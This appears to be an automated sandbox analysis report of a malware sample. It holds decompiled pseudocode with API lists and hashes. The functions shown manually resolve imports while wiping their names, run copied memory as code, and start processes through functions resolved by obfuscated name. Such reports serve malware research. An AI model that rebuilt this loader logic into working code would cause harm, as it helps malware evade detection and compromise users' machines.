                                                                                                                                                                                                                                          0x0112aef6
                                                                                                                                                                                                                                          0x0112aefa
                                                                                                                                                                                                                                          0x0112af00
                                                                                                                                                                                                                                          0x0112af08
                                                                                                                                                                                                                                          0x0112af0a
                                                                                                                                                                                                                                          0x0112af0d
                                                                                                                                                                                                                                          0x0112af13
                                                                                                                                                                                                                                          0x0112af15
                                                                                                                                                                                                                                          0x0112af15
                                                                                                                                                                                                                                          0x0112af08
                                                                                                                                                                                                                                          0x0112aefa
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112aef4
                                                                                                                                                                                                                                          0x0112aead
                                                                                                                                                                                                                                          0x0112aeb0
                                                                                                                                                                                                                                          0x0112aeb7
                                                                                                                                                                                                                                          0x0112aec7
                                                                                                                                                                                                                                          0x0112aeca
                                                                                                                                                                                                                                          0x0112aeda
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112aee0
                                                                                                                                                                                                                                          0x0112aec1
                                                                                                                                                                                                                                          0x0112aec5
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112aec5
                                                                                                                                                                                                                                          0x0112ae92
                                                                                                                                                                                                                                          0x0112ae96
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112ae96
                                                                                                                                                                                                                                          0x0112ae6f
                                                                                                                                                                                                                                          0x0112ae73
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0112AE1E
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 0112AE9B
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0112AEA7
                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0112AEDA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                          • API String ID: 948315288-3993045852
                                                                                                                                                                                                                                          • Opcode ID: 9219377025b26f16bf3e40e807e3b2f5078e5422f699c199a6e2ebbd12085f1d
                                                                                                                                                                                                                                          • Instruction ID: 31bab2a1eb1a310be95cec6d2cd5d84d13f269c058dbba6b6dee1c9ce0193067
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9219377025b26f16bf3e40e807e3b2f5078e5422f699c199a6e2ebbd12085f1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E816EB5A00215AFDB29CFA8E880BADB7F5FF48310F108129EA15E7780E774E955CB51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                                          			E011230FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                                                                                          				WCHAR* _t56;
                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                          				int _t58;
                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                                                          				intOrPtr* _t85;
                                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t74 = __ecx;
                                                                                                                                                                                                                                          				_t79 =  *0x112d33c; // 0x5649bb0
                                                                                                                                                                                                                                          				_v20 = 8;
                                                                                                                                                                                                                                          				_v16 = GetTickCount();
                                                                                                                                                                                                                                          				_t42 = E01129810(_t74,  &_v16);
                                                                                                                                                                                                                                          				_v12 = _t42;
                                                                                                                                                                                                                                          				if(_t42 == 0) {
                                                                                                                                                                                                                                          					_v12 = 0x112c19c;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t44 = E011247E1(_t79);
                                                                                                                                                                                                                                          				_v8 = _t44;
                                                                                                                                                                                                                                          				if(_t44 != 0) {
                                                                                                                                                                                                                                          					_t85 = __imp__;
                                                                                                                                                                                                                                          					_t46 =  *_t85(_v12, _t69);
                                                                                                                                                                                                                                          					_t47 =  *_t85(_v8);
                                                                                                                                                                                                                                          					_t48 =  *_t85(_a4);
                                                                                                                                                                                                                                          					_t49 = lstrlenW(_a8);
                                                                                                                                                                                                                                          					_t53 = E011258BE(lstrlenW(0x112eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x112eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                                                                                                                                                                                                                          					_v16 = _t53;
                                                                                                                                                                                                                                          					if(_t53 != 0) {
                                                                                                                                                                                                                                          						_t75 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          						_t73 =  *0x112d11c; // 0x112abc9
                                                                                                                                                                                                                                          						_t18 = _t75 + 0x112eb38; // 0x530025
                                                                                                                                                                                                                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                                                                                                                                                                                                                          						_t56 =  *_t85(_v8);
                                                                                                                                                                                                                                          						_a8 = _t56;
                                                                                                                                                                                                                                          						_t57 =  *_t85(_a4);
                                                                                                                                                                                                                                          						_t58 = lstrlenW(_a12);
                                                                                                                                                                                                                                          						_t88 = E011258BE(lstrlenW(0x112ec58) + _a8 + _t57 + _t58 + lstrlenW(0x112ec58) + _a8 + _t57 + _t58 + 2);
                                                                                                                                                                                                                                          						if(_t88 == 0) {
                                                                                                                                                                                                                                          							E0112147E(_v16);
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t64 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          							_t31 = _t64 + 0x112ec58; // 0x73006d
                                                                                                                                                                                                                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                                                                                                                                                                                                                          							 *_a16 = _v16;
                                                                                                                                                                                                                                          							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                          							 *_a20 = _t88;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					E0112147E(_v8);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                                          0x011230fc
                                                                                                                                                                                                                                          0x01123104
                                                                                                                                                                                                                                          0x0112310a
                                                                                                                                                                                                                                          0x0112311a
                                                                                                                                                                                                                                          0x0112311d
                                                                                                                                                                                                                                          0x01123122
                                                                                                                                                                                                                                          0x01123127
                                                                                                                                                                                                                                          0x01123129
                                                                                                                                                                                                                                          0x01123129
                                                                                                                                                                                                                                          0x01123132
                                                                                                                                                                                                                                          0x01123137
                                                                                                                                                                                                                                          0x0112313c
                                                                                                                                                                                                                                          0x01123142
                                                                                                                                                                                                                                          0x0112314c
                                                                                                                                                                                                                                          0x01123155
                                                                                                                                                                                                                                          0x0112315c
                                                                                                                                                                                                                                          0x0112316a
                                                                                                                                                                                                                                          0x0112317c
                                                                                                                                                                                                                                          0x01123181
                                                                                                                                                                                                                                          0x01123186
                                                                                                                                                                                                                                          0x0112318f
                                                                                                                                                                                                                                          0x01123198
                                                                                                                                                                                                                                          0x011231a1
                                                                                                                                                                                                                                          0x011231af
                                                                                                                                                                                                                                          0x011231b7
                                                                                                                                                                                                                                          0x011231bc
                                                                                                                                                                                                                                          0x011231bf
                                                                                                                                                                                                                                          0x011231ca
                                                                                                                                                                                                                                          0x011231e1
                                                                                                                                                                                                                                          0x011231e5
                                                                                                                                                                                                                                          0x01123218
                                                                                                                                                                                                                                          0x011231e7
                                                                                                                                                                                                                                          0x011231ea
                                                                                                                                                                                                                                          0x011231f2
                                                                                                                                                                                                                                          0x011231fd
                                                                                                                                                                                                                                          0x01123205
                                                                                                                                                                                                                                          0x0112320d
                                                                                                                                                                                                                                          0x01123211
                                                                                                                                                                                                                                          0x01123211
                                                                                                                                                                                                                                          0x011231e5
                                                                                                                                                                                                                                          0x01123220
                                                                                                                                                                                                                                          0x01123225
                                                                                                                                                                                                                                          0x0112322c

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 01123111
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,80000002), ref: 0112314C
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 01123155
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0112315C
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(80000002), ref: 0112316A
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0112EB38), ref: 01123173
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 011231B7
                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 011231BF
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 011231CA
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0112EC58), ref: 011231D3
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2535036572-0
                                                                                                                                                                                                                                          • Opcode ID: 372412377fd81c0ebbff0e8da1df021d01652e3efc73dac798567969648d99ad
                                                                                                                                                                                                                                          • Instruction ID: 328fde54773b56d40e158849c93b08c3a0ac6c88aa6c093aaa5b90cb9f973e6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 372412377fd81c0ebbff0e8da1df021d01652e3efc73dac798567969648d99ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77316776D0022AFBCF29AFA4DC4499EBFB5FF08208B114065E914A7211DB35DA21DF90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E004015C2(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                          				signed short _v12;
                                                                                                                                                                                                                                          				struct HINSTANCE__* _v16;
                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v24;
                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                                          				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                                                                          				CHAR* _t44;
                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t45;
                                                                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                                                                                          				signed short _t54;
                                                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                                                          				signed short _t59;
                                                                                                                                                                                                                                          				CHAR* _t60;
                                                                                                                                                                                                                                          				CHAR* _t62;
                                                                                                                                                                                                                                          				signed short* _t64;
                                                                                                                                                                                                                                          				void* _t65;
                                                                                                                                                                                                                                          				signed short _t72;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                          				_t52 = _a4;
                                                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                                                          					L28:
                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t57 = _t34 + _t52;
                                                                                                                                                                                                                                          				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                                                                                                                                                                                                                          				_a4 = _t57;
                                                                                                                                                                                                                                          				if(_t36 == 0) {
                                                                                                                                                                                                                                          					L27:
                                                                                                                                                                                                                                          					goto L28;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					_t62 = _t36 + _t52;
                                                                                                                                                                                                                                          					_t37 = LoadLibraryA(_t62);
                                                                                                                                                                                                                                          					_v16 = _t37;
                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                          					memset(_t62, 0, lstrlenA(_t62));
                                                                                                                                                                                                                                          					_t53 =  *_t57;
                                                                                                                                                                                                                                          					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                                                                                                                                                                                                                          					_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                          					if(_t53 != 0) {
                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                          						_t64 = _t53 + _t52;
                                                                                                                                                                                                                                          						_t54 =  *_t64;
                                                                                                                                                                                                                                          						if(_t54 == 0) {
                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                          							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                                                                                                                                                                                                                          							_t57 = _t57 + 0x14;
                                                                                                                                                                                                                                          							_a4 = _t57;
                                                                                                                                                                                                                                          							if(_t36 != 0) {
                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                                                          							goto L27;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_v20 = _t40 - _t64 + _t52;
                                                                                                                                                                                                                                          						_t72 = _t54;
                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                          						if(_t72 < 0) {
                                                                                                                                                                                                                                          							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                                                                                                                                                                                                                          								_t59 = 0;
                                                                                                                                                                                                                                          								_v12 =  *_t64 & 0x0000ffff;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t59 = _t54;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t59 = _t54 + _t52;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t20 = _t59 + 2; // 0x2
                                                                                                                                                                                                                                          						_t44 = _t20;
                                                                                                                                                                                                                                          						if(_t59 == 0) {
                                                                                                                                                                                                                                          							_t44 = _v12 & 0x0000ffff;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t45 = GetProcAddress(_v16, _t44);
                                                                                                                                                                                                                                          						_v24 = _t45;
                                                                                                                                                                                                                                          						if(_t45 == 0) {
                                                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_t59 != 0) {
                                                                                                                                                                                                                                          							_t60 = _t59 + 2;
                                                                                                                                                                                                                                          							memset(_t60, 0, lstrlenA(_t60));
                                                                                                                                                                                                                                          							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						 *(_v20 + _t64) = _v24;
                                                                                                                                                                                                                                          						_t64 =  &(_t64[2]);
                                                                                                                                                                                                                                          						_t54 =  *_t64;
                                                                                                                                                                                                                                          						if(_t54 != 0) {
                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                                                          							_t57 = _a4;
                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                          						_v8 = 0x7f;
                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t53 = _t40;
                                                                                                                                                                                                                                          					if(_t40 == 0) {
                                                                                                                                                                                                                                          						goto L23;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_v8 = 0x7e;
                                                                                                                                                                                                                                          				goto L26;
                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                          0x004015cb
                                                                                                                                                                                                                                          0x004015d1
                                                                                                                                                                                                                                          0x004015d6
                                                                                                                                                                                                                                          0x004015db
                                                                                                                                                                                                                                          0x004016dc
                                                                                                                                                                                                                                          0x004016e1
                                                                                                                                                                                                                                          0x004016e1
                                                                                                                                                                                                                                          0x004015e2
                                                                                                                                                                                                                                          0x004015e5
                                                                                                                                                                                                                                          0x004015e8
                                                                                                                                                                                                                                          0x004015ed
                                                                                                                                                                                                                                          0x004016db
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004016db
                                                                                                                                                                                                                                          0x004015f4
                                                                                                                                                                                                                                          0x004015f4
                                                                                                                                                                                                                                          0x004015f8
                                                                                                                                                                                                                                          0x004015fe
                                                                                                                                                                                                                                          0x00401603
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401609
                                                                                                                                                                                                                                          0x00401618
                                                                                                                                                                                                                                          0x0040161d
                                                                                                                                                                                                                                          0x0040161f
                                                                                                                                                                                                                                          0x00401622
                                                                                                                                                                                                                                          0x00401627
                                                                                                                                                                                                                                          0x00401633
                                                                                                                                                                                                                                          0x00401633
                                                                                                                                                                                                                                          0x00401636
                                                                                                                                                                                                                                          0x0040163a
                                                                                                                                                                                                                                          0x004016c0
                                                                                                                                                                                                                                          0x004016c0
                                                                                                                                                                                                                                          0x004016c3
                                                                                                                                                                                                                                          0x004016c6
                                                                                                                                                                                                                                          0x004016cb
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004016da
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004016da
                                                                                                                                                                                                                                          0x00401644
                                                                                                                                                                                                                                          0x00401647
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00401649
                                                                                                                                                                                                                                          0x00401649
                                                                                                                                                                                                                                          0x00401652
                                                                                                                                                                                                                                          0x00401667
                                                                                                                                                                                                                                          0x00401669
                                                                                                                                                                                                                                          0x00401660
                                                                                                                                                                                                                                          0x00401660
                                                                                                                                                                                                                                          0x00401660
                                                                                                                                                                                                                                          0x0040164b
                                                                                                                                                                                                                                          0x0040164b
                                                                                                                                                                                                                                          0x0040164b
                                                                                                                                                                                                                                          0x0040166c
                                                                                                                                                                                                                                          0x0040166c
                                                                                                                                                                                                                                          0x00401671
                                                                                                                                                                                                                                          0x00401673
                                                                                                                                                                                                                                          0x00401673
                                                                                                                                                                                                                                          0x0040167b
                                                                                                                                                                                                                                          0x00401681
                                                                                                                                                                                                                                          0x00401686
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040168a
                                                                                                                                                                                                                                          0x0040168c
                                                                                                                                                                                                                                          0x0040169a
                                                                                                                                                                                                                                          0x0040169f
                                                                                                                                                                                                                                          0x0040169f
                                                                                                                                                                                                                                          0x004016a8
                                                                                                                                                                                                                                          0x004016ab
                                                                                                                                                                                                                                          0x004016ae
                                                                                                                                                                                                                                          0x004016b2
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004016b4
                                                                                                                                                                                                                                          0x004016bd
                                                                                                                                                                                                                                          0x004016bd
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004016bd
                                                                                                                                                                                                                                          0x004016b6
                                                                                                                                                                                                                                          0x004016b6
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004016b6
                                                                                                                                                                                                                                          0x00401629
                                                                                                                                                                                                                                          0x0040162d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040162d
                                                                                                                                                                                                                                          0x004016d3
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID: ~
                                                                                                                                                                                                                                          • API String ID: 1986585659-1707062198
                                                                                                                                                                                                                                          • Opcode ID: c459e5c4b2257f60a85b8f4a256c25176788778794111ee305b4c7d525299c5e
                                                                                                                                                                                                                                          • Instruction ID: 1541f1383029c81c561c658891bc730305bdf5491dfdc73c382b85a44619650c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c459e5c4b2257f60a85b8f4a256c25176788778794111ee305b4c7d525299c5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73316DB5A01206ABDB10CF55CC90AAEB7B8AF44344F25453AE805FB3A0D739EA41CB58
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                                                                                          			E01121493(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                          				void _v104;
                                                                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                          				intOrPtr _t49;
                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                                          				intOrPtr* _t69;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                          				_t67 =  *_t1;
                                                                                                                                                                                                                                          				_t36 = E011257D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                                                                                                                                                                                                                          				_v8 = _t36;
                                                                                                                                                                                                                                          				if(_t36 != 0) {
                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                                                                                                                                                                                                                          				_t39 = _v12(_v12);
                                                                                                                                                                                                                                          				_v8 = _t39;
                                                                                                                                                                                                                                          				if(_t39 == 0 && ( *0x112d260 & 0x00000001) != 0) {
                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                                          					_v108 = 0;
                                                                                                                                                                                                                                          					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                          					_t46 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t18 = _t46 + 0x112e3e6; // 0x73797325
                                                                                                                                                                                                                                          					_t66 = E011277E6(_t18);
                                                                                                                                                                                                                                          					if(_t66 == 0) {
                                                                                                                                                                                                                                          						_v8 = 8;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t49 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          						_t19 = _t49 + 0x112e747; // 0x5648cef
                                                                                                                                                                                                                                          						_t20 = _t49 + 0x112e0af; // 0x4e52454b
                                                                                                                                                                                                                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                                          						if(_t69 == 0) {
                                                                                                                                                                                                                                          							_v8 = 0x7f;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_v108 = 0x44;
                                                                                                                                                                                                                                          							E0112684E();
                                                                                                                                                                                                                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                                          							_push(1);
                                                                                                                                                                                                                                          							E0112684E();
                                                                                                                                                                                                                                          							if(_t57 == 0) {
                                                                                                                                                                                                                                          								_v8 = GetLastError();
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								CloseHandle(_v28);
                                                                                                                                                                                                                                          								CloseHandle(_v32);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						HeapFree( *0x112d238, 0, _t66);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t68 = _v16;
                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                                                                                                                                                                                                                          				E0112147E(_t68);
                                                                                                                                                                                                                                          				goto L12;
                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                          0x0112149b
                                                                                                                                                                                                                                          0x0112149b
                                                                                                                                                                                                                                          0x011214aa
                                                                                                                                                                                                                                          0x011214b1
                                                                                                                                                                                                                                          0x011214b6
                                                                                                                                                                                                                                          0x011215c6
                                                                                                                                                                                                                                          0x011215cd
                                                                                                                                                                                                                                          0x011215cd
                                                                                                                                                                                                                                          0x011214c5
                                                                                                                                                                                                                                          0x011214d0
                                                                                                                                                                                                                                          0x011214d3
                                                                                                                                                                                                                                          0x011214d8
                                                                                                                                                                                                                                          0x011214ed
                                                                                                                                                                                                                                          0x011214f3
                                                                                                                                                                                                                                          0x011214f4
                                                                                                                                                                                                                                          0x011214f7
                                                                                                                                                                                                                                          0x011214fd
                                                                                                                                                                                                                                          0x01121500
                                                                                                                                                                                                                                          0x01121505
                                                                                                                                                                                                                                          0x0112150d
                                                                                                                                                                                                                                          0x01121519
                                                                                                                                                                                                                                          0x0112151d
                                                                                                                                                                                                                                          0x011215ad
                                                                                                                                                                                                                                          0x01121523
                                                                                                                                                                                                                                          0x01121523
                                                                                                                                                                                                                                          0x01121528
                                                                                                                                                                                                                                          0x0112152f
                                                                                                                                                                                                                                          0x01121543
                                                                                                                                                                                                                                          0x01121547
                                                                                                                                                                                                                                          0x01121596
                                                                                                                                                                                                                                          0x01121549
                                                                                                                                                                                                                                          0x0112154a
                                                                                                                                                                                                                                          0x01121551
                                                                                                                                                                                                                                          0x0112156a
                                                                                                                                                                                                                                          0x0112156c
                                                                                                                                                                                                                                          0x01121570
                                                                                                                                                                                                                                          0x01121577
                                                                                                                                                                                                                                          0x01121591
                                                                                                                                                                                                                                          0x01121579
                                                                                                                                                                                                                                          0x01121582
                                                                                                                                                                                                                                          0x01121587
                                                                                                                                                                                                                                          0x01121587
                                                                                                                                                                                                                                          0x01121577
                                                                                                                                                                                                                                          0x011215a5
